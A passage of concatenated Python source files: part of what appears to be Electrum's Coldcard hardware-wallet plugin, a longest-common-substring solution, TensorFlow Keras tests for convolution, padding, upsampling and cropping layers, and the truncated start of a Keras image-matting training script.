except Exception as e:
self.logger.exception('late failure connecting to device?')
return None
def setup_device(self, device_info, wizard, purpose):
device_id = device_info.device.id_
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
return client
def get_xpub(self, device_id, derivation, xtype, wizard):
# this seems to be part of the pairing process only, not during normal ops?
# base_wizard:on_hw_derivation
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
client = self.scan_and_create_client_for_device(device_id=device_id, wizard=wizard)
client.ping_check()
xpub = client.get_xpub(derivation, xtype)
return xpub
@runs_in_hwd_thread
def get_client(self, keystore, force_pair=True, *,
devices=None, allow_user_interaction=True) -> Optional['CKCCClient']:
# Acquire a connection to the hardware device (via USB)
client = super().get_client(keystore, force_pair,
devices=devices,
allow_user_interaction=allow_user_interaction)
if client is not None:
client.ping_check()
return client
@staticmethod
def export_ms_wallet(wallet: Multisig_Wallet, fp, name):
# Build the text file Coldcard needs to understand the multisig wallet
# it is participating in. All involved Coldcards can share same file.
assert isinstance(wallet, Multisig_Wallet)
print('# Exported from Electrum', file=fp)
print(f'Name: {name:.20s}', file=fp)
print(f'Policy: {wallet.m} of {wallet.n}', file=fp)
print(f'Format: {wallet.txin_type.upper()}', file=fp)
xpubs = []
for xpub, ks in zip(wallet.get_master_public_keys(), wallet.get_keystores()): # type: str, KeyStoreWithMPK
fp_bytes, der_full = ks.get_fp_and_derivation_to_be_used_in_partial_tx(der_suffix=[], only_der_suffix=False)
fp_hex = fp_bytes.hex().upper()
der_prefix_str = bip32.convert_bip32_intpath_to_strpath(der_full)
xpubs.append((fp_hex, xpub, der_prefix_str))
# Before v3.2.1 derivation didn't matter too much to the Coldcard, since it
# could use key path data from PSBT or USB request as needed. However,
# derivation data is now required.
print('', file=fp)
assert len(xpubs) == wallet.n
for xfp, xpub, der_prefix in xpubs:
print(f'Derivation: {der_prefix}', file=fp)
print(f'{xfp}: {xpub}\n', file=fp)
def show_address(self, wallet, address, keystore: 'Coldcard_KeyStore' = None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
txin_type = wallet.get_txin_type(address)
# Standard_Wallet => not multisig, must be bip32
if type(wallet) is Standard_Wallet:
sequence = wallet.get_address_index(address)
keystore.show_address(sequence, txin_type)
elif type(wallet) is Multisig_Wallet:
assert isinstance(wallet, Multisig_Wallet) # only here for type-hints in IDE
# More involved for P2SH/P2WSH addresses: need M, and all public keys, and their
# derivation paths. Must construct script, and track fingerprints+paths for
# all those keys
pubkey_deriv_info = wallet.get_public_keys_with_deriv_info(address)
pubkey_hexes = sorted([pk.hex() for pk in list(pubkey_deriv_info)])
xfp_paths = []
for pubkey_hex in pubkey_hexes:
pubkey = bytes.fromhex(pubkey_hex)
ks, der_suffix = pubkey_deriv_info[pubkey]
fp_bytes, der_full = ks.get_fp_and_derivation_to_be_used_in_partial_tx(der_suffix, only_der_suffix=False)
xfp_int = xfp_int_from_xfp_bytes(fp_bytes)
xfp_paths.append([xfp_int] + list(der_full))
script = bfh(wallet.pubkeys_to_scriptcode(pubkey_hexes))
keystore.show_p2sh_address(wallet.m, script, xfp_paths, txin_type)
else:
keystore.handler.show_error(_('This function is only available for standard wallets when using {}.').format(self.device))
return
def xfp_int_from_xfp_bytes(fp_bytes: bytes) -> int:
return int.from_bytes(fp_bytes, byteorder="little", signed=False)
def xfp2str(xfp: int) -> str:
# Standardized way to show an xpub's fingerprint... it's a 4-byte string
# and not really an integer. Used to show as '0x%08x' but that's wrong endian.
return struct.pack('<I', xfp).hex().lower()
# EOF
|
# problem - https://practice.geeksforgeeks.org/problems/longest-common-substring1452/1
class Solution:
def longestCommonSubstr(self, S1, S2, n, m):
res = 0
rows,col = n+1,m+1
dp = [[0]*col for i in range(rows)]
for i in range(1,rows):
for j in range(1,col):
if S1[i-1] == S2[j-1]:
dp[i][j] = dp[i-1][j-1]+1
res = max(res,dp[i][j])
else:
dp[i][j] = 0
return(res)
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for convolutional layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.platform import test
@keras_parameterized.run_all_keras_modes
class Conv1DTest(keras_parameterized.TestCase):
def _run_test(self, kwargs, expected_output_shape):
num_samples = 2
stack_size = 3
length = 7
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.Conv1D,
kwargs=kwargs,
input_shape=(num_samples, length, stack_size),
expected_output_shape=expected_output_shape)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'}, (None, 5, 2)),
('padding_same', {'padding': 'same'}, (None, 7, 2)),
('padding_same_dilation_2', {'padding': 'same', 'dilation_rate': 2},
(None, 7, 2)),
('padding_same_dilation_3', {'padding': 'same', 'dilation_rate': 3},
(None, 7, 2)),
('padding_causal', {'padding': 'causal'}, (None, 7, 2)),
('strides', {'strides': 2}, (None, 3, 2)),
('dilation_rate', {'dilation_rate': 2}, (None, 3, 2)),
)
def test_conv1d(self, kwargs, expected_output_shape):
kwargs['filters'] = 2
kwargs['kernel_size'] = 3
self._run_test(kwargs, expected_output_shape)
def test_conv1d_regularizers(self):
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_regularizer': 'l2',
'bias_regularizer': 'l2',
'activity_regularizer': 'l2',
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv1D(**kwargs)
layer.build((None, 5, 2))
self.assertEqual(len(layer.losses), 2)
layer(keras.backend.variable(np.ones((1, 5, 2))))
self.assertEqual(len(layer.losses), 3)
def test_conv1d_constraints(self):
k_constraint = lambda x: x
b_constraint = lambda x: x
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_constraint': k_constraint,
'bias_constraint': b_constraint,
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv1D(**kwargs)
layer.build((None, 5, 2))
self.assertEqual(layer.kernel.constraint, k_constraint)
self.assertEqual(layer.bias.constraint, b_constraint)
@keras_parameterized.run_all_keras_modes
class Conv2DTest(keras_parameterized.TestCase):
def _run_test(self, kwargs, expected_output_shape):
num_samples = 2
stack_size = 3
num_row = 7
num_col = 6
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.Conv2D,
kwargs=kwargs,
input_shape=(num_samples, num_row, num_col, stack_size),
expected_output_shape=expected_output_shape)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'}, (None, 5, 4, 2)),
('padding_same', {'padding': 'same'}, (None, 7, 6, 2)),
('padding_same_dilation_2', {'padding': 'same', 'dilation_rate': 2},
(None, 7, 6, 2)),
('strides', {'strides': (2, 2)}, (None, 3, 2, 2)),
('dilation_rate', {'dilation_rate': (2, 2)}, (None, 3, 2, 2)),
# Only runs on GPU with CUDA, channels_first is not supported on CPU.
# TODO(b/62340061): Support channels_first on CPU.
('data_format', {'data_format': 'channels_first'}),
)
def test_conv2d(self, kwargs, expected_output_shape=None):
kwargs['filters'] = 2
kwargs['kernel_size'] = (3, 3)
if 'data_format' not in kwargs or test.is_gpu_available(cuda_only=True):
self._run_test(kwargs, expected_output_shape)
def test_conv2d_regularizers(self):
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_regularizer': 'l2',
'bias_regularizer': 'l2',
'activity_regularizer': 'l2',
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv2D(**kwargs)
layer.build((None, 5, 5, 2))
self.assertEqual(len(layer.losses), 2)
layer(keras.backend.variable(np.ones((1, 5, 5, 2))))
self.assertEqual(len(layer.losses), 3)
def test_conv2d_constraints(self):
k_constraint = lambda x: x
b_constraint = lambda x: x
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_constraint': k_constraint,
'bias_constraint': b_constraint,
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv2D(**kwargs)
layer.build((None, 5, 5, 2))
self.assertEqual(layer.kernel.constraint, k_constraint)
self.assertEqual(layer.bias.constraint, b_constraint)
@keras_parameterized.run_all_keras_modes
class Conv3DTest(keras_parameterized.TestCase):
def _run_test(self, kwargs, expected_output_shape):
num_samples = 2
stack_size = 3
num_row = 7
num_col = 6
depth = 5
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.Conv3D,
kwargs=kwargs,
input_shape=(num_samples, depth, num_row, num_col, stack_size),
expected_output_shape=expected_output_shape)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'}, (None, 3, 5, 4, 2)),
('padding_same', {'padding': 'same'}, (None, 5, 7, 6, 2)),
('strides', {'strides': (2, 2, 2)}, (None, 2, 3, 2, 2)),
('dilation_rate', {'dilation_rate': (2, 2, 2)}, (None, 1, 3, 2, 2)),
# Only runs on GPU with CUDA, channels_first is not supported on CPU.
# TODO(b/62340061): Support channels_first on CPU.
('data_format', {'data_format': 'channels_first'}),
)
def test_conv3d(self, kwargs, expected_output_shape=None):
kwargs['filters'] = 2
kwargs['kernel_size'] = (3, 3, 3)
if 'data_format' not in kwargs or test.is_gpu_available(cuda_only=True):
self._run_test(kwargs, expected_output_shape)
def test_conv3d_regularizers(self):
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_regularizer': 'l2',
'bias_regularizer': 'l2',
'activity_regularizer': 'l2',
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv3D(**kwargs)
layer.build((None, 5, 5, 5, 2))
self.assertEqual(len(layer.losses), 2)
self.assertEqual(len(layer.losses), 2)
layer(keras.backend.variable(np.ones((1, 5, 5, 5, 2))))
self.assertEqual(len(layer.losses), 3)
def test_conv3d_constraints(self):
k_constraint = lambda x: x
b_constraint = lambda x: x
kwargs = {
'filters': 3,
'kernel_size': 3,
'padding': 'valid',
'kernel_constraint': k_constraint,
'bias_constraint': b_constraint,
'strides': 1
}
with self.cached_session(use_gpu=True):
layer = keras.layers.Conv3D(**kwargs)
layer.build((None, 5, 5, 5, 2))
self.assertEqual(layer.kernel.constraint, k_constraint)
self.assertEqual(layer.bias.constraint, b_constraint)
def test_conv3d_dynamic_shape(self):
input_data = np.random.random((1, 3, 3, 3, 3)).astype(np.float32)
with self.cached_session(use_gpu=True):
# Won't raise error here.
testing_utils.layer_test(
keras.layers.Conv3D,
kwargs={
'data_format': 'channels_last',
'filters': 3,
'kernel_size': 3
},
input_shape=(None, None, None, None, 3),
input_data=input_data)
if test.is_gpu_available(cuda_only=True):
testing_utils.layer_test(
keras.layers.Conv3D,
kwargs={
'data_format': 'channels_first',
'filters': 3,
'kernel_size': 3
},
input_shape=(None, 3, None, None, None),
input_data=input_data)
@keras_parameterized.run_all_keras_modes
class ConvSequentialTest(keras_parameterized.TestCase):
def _run_test(self, conv_layer_cls, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2):
kwargs['filters'] = 1
kwargs['kernel_size'] = 3
kwargs['dilation_rate'] = 2
with self.cached_session(use_gpu=True):
layer = conv_layer_cls(**kwargs)
output1 = layer(np.zeros(input_shape1))
self.assertEqual(output1.shape, expected_output_shape1)
output2 = layer(np.zeros(input_shape2))
self.assertEqual(output2.shape, expected_output_shape2)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'},
(1, 8, 2), (1, 5, 2), (1, 4, 1), (1, 1, 1)),
('padding_same', {'padding': 'same'},
(1, 8, 2), (1, 5, 2), (1, 8, 1), (1, 5, 1)),
('padding_causal', {'padding': 'causal'},
(1, 8, 2), (1, 5, 2), (1, 8, 1), (1, 5, 1)),
)
def test_conv1d(self, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2):
self._run_test(keras.layers.Conv1D, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'},
(1, 7, 6, 2), (1, 6, 5, 2), (1, 3, 2, 1), (1, 2, 1, 1)),
('padding_same', {'padding': 'same'},
(1, 7, 6, 2), (1, 6, 5, 2), (1, 7, 6, 1), (1, 6, 5, 1)),
)
def test_conv2d(self, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2):
self._run_test(keras.layers.Conv2D, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2)
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'},
(1, 5, 7, 6, 2), (1, 8, 6, 5, 2), (1, 1, 3, 2, 1), (1, 4, 2, 1, 1)),
('padding_same', {'padding': 'same'},
(1, 5, 7, 6, 2), (1, 8, 6, 5, 2), (1, 5, 7, 6, 1), (1, 8, 6, 5, 1)),
)
def test_conv3d(self, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2):
self._run_test(keras.layers.Conv3D, kwargs, input_shape1, input_shape2,
expected_output_shape1, expected_output_shape2)
@keras_parameterized.run_all_keras_modes
class ZeroPaddingTest(keras_parameterized.TestCase):
def test_zero_padding_1d(self):
num_samples = 2
input_dim = 2
num_steps = 5
shape = (num_samples, num_steps, input_dim)
inputs = np.ones(shape)
with self.cached_session(use_gpu=True):
# basic test
testing_utils.layer_test(
keras.layers.ZeroPadding1D,
kwargs={'padding': 2},
input_shape=inputs.shape)
testing_utils.layer_test(
keras.layers.ZeroPadding1D,
kwargs={'padding': (1, 2)},
input_shape=inputs.shape)
# correctness test
layer = keras.layers.ZeroPadding1D(padding=2)
layer.build(shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
for offset in [0, 1, -1, -2]:
np.testing.assert_allclose(np_output[:, offset, :], 0.)
np.testing.assert_allclose(np_output[:, 2:-2, :], 1.)
layer = keras.layers.ZeroPadding1D(padding=(1, 2))
layer.build(shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
for left_offset in [0]:
np.testing.assert_allclose(np_output[:, left_offset, :], 0.)
for right_offset in [-1, -2]:
np.testing.assert_allclose(np_output[:, right_offset, :], 0.)
np.testing.assert_allclose(np_output[:, 1:-2, :], 1.)
layer.get_config()
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.ZeroPadding1D(padding=(1, 1, 1))
with self.assertRaises(ValueError):
keras.layers.ZeroPadding1D(padding=None)
def test_zero_padding_2d(self):
num_samples = 2
stack_size = 2
input_num_row = 4
input_num_col = 5
for data_format in ['channels_first', 'channels_last']:
inputs = np.ones((num_samples, input_num_row, input_num_col, stack_size))
inputs = np.ones((num_samples, stack_size, input_num_row, input_num_col))
# basic test
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.ZeroPadding2D,
kwargs={'padding': (2, 2),
'data_format': data_format},
input_shape=inputs.shape)
testing_utils.layer_test(
keras.layers.ZeroPadding2D,
kwargs={'padding': ((1, 2), (3, 4)),
'data_format': data_format},
input_shape=inputs.shape)
# correctness test
with self.cached_session(use_gpu=True):
layer = keras.layers.ZeroPadding2D(
padding=(2, 2), data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
if data_format == 'channels_last':
for offset in [0, 1, -1, -2]:
np.testing.assert_allclose(np_output[:, offset, :, :], 0.)
np.testing.assert_allclose(np_output[:, :, offset, :], 0.)
np.testing.assert_allclose(np_output[:, 2:-2, 2:-2, :], 1.)
elif data_format == 'channels_first':
for offset in [0, 1, -1, -2]:
np.testing.assert_allclose(np_output[:, :, offset, :], 0.)
np.testing.assert_allclose(np_output[:, :, :, offset], 0.)
np.testing.assert_allclose(np_output[:, 2:-2, 2:-2, :], 1.)
layer = keras.layers.ZeroPadding2D(
padding=((1, 2), (3, 4)), data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
if data_format == 'channels_last':
for top_offset in [0]:
np.testing.assert_allclose(np_output[:, top_offset, :, :], 0.)
for bottom_offset in [-1, -2]:
np.testing.assert_allclose(np_output[:, bottom_offset, :, :], 0.)
for left_offset in [0, 1, 2]:
np.testing.assert_allclose(np_output[:, :, left_offset, :], 0.)
for right_offset in [-1, -2, -3, -4]:
np.testing.assert_allclose(np_output[:, :, right_offset, :], 0.)
np.testing.assert_allclose(np_output[:, 1:-2, 3:-4, :], 1.)
elif data_format == 'channels_first':
for top_offset in [0]:
np.testing.assert_allclose(np_output[:, :, top_offset, :], 0.)
for bottom_offset in [-1, -2]:
np.testing.assert_allclose(np_output[:, :, bottom_offset, :], 0.)
for left_offset in [0, 1, 2]:
np.testing.assert_allclose(np_output[:, :, :, left_offset], 0.)
for right_offset in [-1, -2, -3, -4]:
np.testing.assert_allclose(np_output[:, :, :, right_offset], 0.)
np.testing.assert_allclose(np_output[:, :, 1:-2, 3:-4], 1.)
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.ZeroPadding2D(padding=(1, 1, 1))
with self.assertRaises(ValueError):
keras.layers.ZeroPadding2D(padding=None)
def test_zero_padding_3d(self):
num_samples = 2
stack_size = 2
input_len_dim1 = 4
input_len_dim2 = 5
input_len_dim3 = 3
inputs = np.ones((num_samples, input_len_dim1, input_len_dim2,
input_len_dim3, stack_size))
with self.cached_session(use_gpu=True):
# basic test
testing_utils.layer_test(
keras.layers.ZeroPadding3D,
kwargs={'padding': (2, 2, 2)},
input_shape=inputs.shape)
# correctness test
layer = keras.layers.ZeroPadding3D(padding=(2, 2, 2))
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
for offset in [0, 1, -1, -2]:
np.testing.assert_allclose(np_output[:, offset, :, :, :], 0.)
np.testing.assert_allclose(np_output[:, :, offset, :, :], 0.)
np.testing.assert_allclose(np_output[:, :, :, offset, :], 0.)
np.testing.assert_allclose(np_output[:, 2:-2, 2:-2, 2:-2, :], 1.)
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.ZeroPadding3D(padding=(1, 1))
with self.assertRaises(ValueError):
keras.layers.ZeroPadding3D(padding=None)
@test_util.for_all_test_methods(test_util.disable_xla,
'align_corners=False not supported by XLA')
@keras_parameterized.run_all_keras_modes
class UpSamplingTest(keras_parameterized.TestCase):
def test_upsampling_1d(self):
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.UpSampling1D, kwargs={'size': 2}, input_shape=(3, 5, 4))
def test_upsampling_2d(self):
num_samples = 2
stack_size = 2
input_num_row = 11
input_num_col = 12
for data_format in ['channels_first', 'channels_last']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_num_row,
input_num_col)
else:
inputs = np.random.rand(num_samples, input_num_row, input_num_col,
stack_size)
# basic test
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.UpSampling2D,
kwargs={'size': (2, 2),
'data_format': data_format},
input_shape=inputs.shape)
for length_row in [2]:
for length_col in [2, 3]:
layer = keras.layers.UpSampling2D(
size=(length_row, length_col), data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
if data_format == 'channels_first':
assert np_output.shape[2] == length_row * input_num_row
assert np_output.shape[3] == length_col * input_num_col
else: # tf
assert np_output.shape[1] == length_row * input_num_row
assert np_output.shape[2] == length_col * input_num_col
# compare with numpy
if data_format == 'channels_first':
expected_out = np.repeat(inputs, length_row, axis=2)
expected_out = np.repeat(expected_out, length_col, axis=3)
else: # tf
expected_out = np.repeat(inputs, length_row, axis=1)
expected_out = np.repeat(expected_out, length_col, axis=2)
np.testing.assert_allclose(np_output, expected_out)
def test_upsampling_2d_bilinear(self):
num_samples = 2
stack_size = 2
input_num_row = 11
input_num_col = 12
for data_format in ['channels_first', 'channels_last']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_num_row,
input_num_col)
else:
inputs = np.random.rand(num_samples, input_num_row, input_num_col,
stack_size)
testing_utils.layer_test(keras.layers.UpSampling2D,
kwargs={'size': (2, 2),
'data_format': data_format,
'interpolation': 'bilinear'},
input_shape=inputs.shape)
if not context.executing_eagerly():
for length_row in [2]:
for length_col in [2, 3]:
layer = keras.layers.UpSampling2D(
size=(length_row, length_col),
data_format=data_format)
layer.build(inputs.shape)
outputs = layer(keras.backend.variable(inputs))
np_output = keras.backend.eval(outputs)
if data_format == 'channels_first':
self.assertEqual(np_output.shape[2], length_row * input_num_row)
self.assertEqual(np_output.shape[3], length_col * input_num_col)
else:
self.assertEqual(np_output.shape[1], length_row * input_num_row)
self.assertEqual(np_output.shape[2], length_col * input_num_col)
def test_upsampling_3d(self):
num_samples = 2
stack_size = 2
input_len_dim1 = 10
input_len_dim2 = 11
input_len_dim3 = 12
for data_format in ['channels_first', 'channels_last']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_len_dim1,
input_len_dim2, input_len_dim3)
else:
inputs = np.random.rand(num_samples, input_len_dim1, input_len_dim2,
input_len_dim3, stack_size)
# basic test
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.UpSampling3D,
kwargs={'size': (2, 2, 2),
'data_format': data_format},
input_shape=inputs.shape)
for length_dim1 in [2, 3]:
for length_dim2 in [2]:
for length_dim3 in [3]:
layer = keras.layers.UpSampling3D(
size=(length_dim1, length_dim2, length_dim3),
data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
if data_format == 'channels_first':
assert np_output.shape[2] == length_dim1 * input_len_dim1
assert np_output.shape[3] == length_dim2 * input_len_dim2
assert np_output.shape[4] == length_dim3 * input_len_dim3
else: # tf
assert np_output.shape[1] == length_dim1 * input_len_dim1
assert np_output.shape[2] == length_dim2 * input_len_dim2
assert np_output.shape[3] == length_dim3 * input_len_dim3
# compare with numpy
if data_format == 'channels_first':
expected_out = np.repeat(inputs, length_dim1, axis=2)
expected_out = np.repeat(expected_out, length_dim2, axis=3)
expected_out = np.repeat(expected_out, length_dim3, axis=4)
else: # tf
expected_out = np.repeat(inputs, length_dim1, axis=1)
expected_out = np.repeat(expected_out, length_dim2, axis=2)
expected_out = np.repeat(expected_out, length_dim3, axis=3)
np.testing.assert_allclose(np_output, expected_out)
@keras_parameterized.run_all_keras_modes
class CroppingTest(keras_parameterized.TestCase):
def test_cropping_1d(self):
num_samples = 2
time_length = 4
input_len_dim1 = 2
inputs = np.random.rand(num_samples, time_length, input_len_dim1)
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.Cropping1D,
kwargs={'cropping': (2, 2)},
input_shape=inputs.shape)
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.Cropping1D(cropping=(1, 1, 1))
with self.assertRaises(ValueError):
keras.layers.Cropping1D(cropping=None)
def test_cropping_2d(self):
num_samples = 2
stack_size = 2
input_len_dim1 = 9
input_len_dim2 = 9
cropping = ((2, 2), (3, 3))
for data_format in ['channels_first', 'channels_last']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_len_dim1,
input_len_dim2)
else:
inputs = np.random.rand(num_samples, input_len_dim1, input_len_dim2,
stack_size)
with self.cached_session(use_gpu=True):
# basic test
testing_utils.layer_test(
keras.layers.Cropping2D,
kwargs={'cropping': cropping,
'data_format': data_format},
input_shape=inputs.shape)
# correctness test
layer = keras.layers.Cropping2D(
cropping=cropping, data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
# compare with numpy
if data_format == 'channels_first':
expected_out = inputs[:, :, cropping[0][0]:-cropping[0][1], cropping[
1][0]:-cropping[1][1]]
else:
expected_out = inputs[:, cropping[0][0]:-cropping[0][1], cropping[1][
0]:-cropping[1][1], :]
np.testing.assert_allclose(np_output, expected_out)
for data_format in ['channels_first', 'channels_last']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_len_dim1,
input_len_dim2)
else:
inputs = np.random.rand(num_samples, input_len_dim1, input_len_dim2,
stack_size)
# another correctness test (no cropping)
with self.cached_session(use_gpu=True):
cropping = ((0, 0), (0, 0))
layer = keras.layers.Cropping2D(
cropping=cropping, data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
# compare with input
np.testing.assert_allclose(np_output, inputs)
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.Cropping2D(cropping=(1, 1, 1))
with self.assertRaises(ValueError):
keras.layers.Cropping2D(cropping=None)
def test_cropping_3d(self):
num_samples = 2
stack_size = 2
input_len_dim1 = 8
input_len_dim2 = 8
input_len_dim3 = 8
croppings = [((2, 2), (1, 1), (2, 3)), 3, (0, 1, 1)]
for cropping in croppings:
for data_format in ['channels_last', 'channels_first']:
if data_format == 'channels_first':
inputs = np.random.rand(num_samples, stack_size, input_len_dim1,
input_len_dim2, input_len_dim3)
else:
inputs = np.random.rand(num_samples, input_len_dim1, input_len_dim2,
input_len_dim3, stack_size)
# basic test
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.Cropping3D,
kwargs={'cropping': cropping,
'data_format': data_format},
input_shape=inputs.shape)
if len(croppings) == 3 and len(croppings[0]) == 2:
# correctness test
with self.cached_session(use_gpu=True):
layer = keras.layers.Cropping3D(
cropping=cropping, data_format=data_format)
layer.build(inputs.shape)
output = layer(keras.backend.variable(inputs))
if context.executing_eagerly():
np_output = output.numpy()
else:
np_output = keras.backend.eval(output)
# compare with numpy
if data_format == 'channels_first':
expected_out = inputs[:, :,
cropping[0][0]:-cropping[0][1],
cropping[1][0]:-cropping[1][1],
cropping[2][0]:-cropping[2][1]]
else:
expected_out = inputs[:,
cropping[0][0]:-cropping[0][1],
cropping[1][0]:-cropping[1][1],
cropping[2][0]:-cropping[2][1], :]
np.testing.assert_allclose(np_output, expected_out)
# test incorrect use
with self.assertRaises(ValueError):
keras.layers.Cropping3D(cropping=(1, 1))
with self.assertRaises(ValueError):
keras.layers.Cropping3D(cropping=None)
@keras_parameterized.run_all_keras_modes
class DepthwiseConv2DTest(keras_parameterized.TestCase):
def _run_test(self, kwargs):
num_samples = 2
stack_size = 3
num_row = 7
num_col = 6
with self.cached_session(use_gpu=True):
testing_utils.layer_test(
keras.layers.DepthwiseConv2D,
kwargs=kwargs,
input_shape=(num_samples, num_row, num_col, stack_size))
@parameterized.named_parameters(
('padding_valid', {'padding': 'valid'}),
('padding_same', {'padding': 'same'}),
('strides', {'strides': (2, 2)}),
# Only runs on GPU with CUDA, channels_first is not supported on CPU.
# TODO(b/62340061): Support channels_first on CPU.
('data_format', {'data_format': 'channels_first'}),
('depth_multiplier_1', {'depth_multiplier': 1}),
('depth_multiplier_2', {'depth_multiplier': 2}),
)
def test_depthwise_conv2d(self, kwargs):
kwargs['kernel_size'] = (3, 3)
if 'data_format' not in kwargs or test.is_gpu_available(cuda_only=True):
self._run_test(kwargs)
def test_depthwise_conv2d_full(self):
kwargs = {
'kernel_size': 3,
'padding': 'valid',
'data_format': 'channels_last',
'activation': None,
'depthwise_regularizer': 'l2',
'bias_regularizer': 'l2',
'activity_regularizer': 'l2',
'depthwise_constraint': 'unit_norm',
'use_bias': True,
'strides': (2, 2),
'depth_multiplier': 1,
}
self._run_test(kwargs)
if __name__ == '__main__':
test.main()
|
import argparse
import keras
import tensorflow as tf
from keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau
from keras.utils import multi_gpu_model
import migrate
from config import patience, batch_size, epochs, num_train_samples, num_valid_samples
from data_generator import train_gen, valid_gen
from model import build_encoder_decoder
from utils import overall_loss, get_available_cpus, get_available_gpus
if __name__ == '__main__':
# Parse arguments
ap = argparse.ArgumentParser()
ap.add_argument("-c", "--checkpoint", help="path to save checkpoint model files")
ap.add_argument("-p", "--pretrained", help="path to save pretrained model files")
args = vars(ap.parse_args())
checkpoint_path = args["checkpoint"]
pretrained_path = args["pretrained"]
# pretrained_path = 'models/vgg16_weights_tf_dim_ordering_tf_kernels.h5'
if checkpoint_path is None:
checkpoint_models_path = 'models/'
else:
# python train_encoder_decoder.py -c /mnt/Deep-Image-Matting/models/
checkpoint_models_path = '{}/'.format(checkpoint_path)
# Callbacks
tensor_board = keras.callbacks.TensorBoard(log_dir='./logs', histogram_freq=0, write_graph=True, write_images=True)
model_names = checkpoint_models_path + 'model.{epoch:02d}-{val_loss:.4f}.hdf5'
model_checkpoint = ModelCheckpoint(model_names, monitor='val_loss', verbose=1, save_best_only=True)
early_stop = EarlyStopping('val_loss', patience=patience)
reduce_lr = ReduceLROnPlateau('val_loss', factor=0.1, patience=int(patience / 4), verbose=1)
class MyCbk(keras.callbacks.Callback):
def __init__(self, model):
keras.callbacks.Callback.__init__(self)
self.model_to_save = model
def on_epoch_end(self, epoch, logs=None):
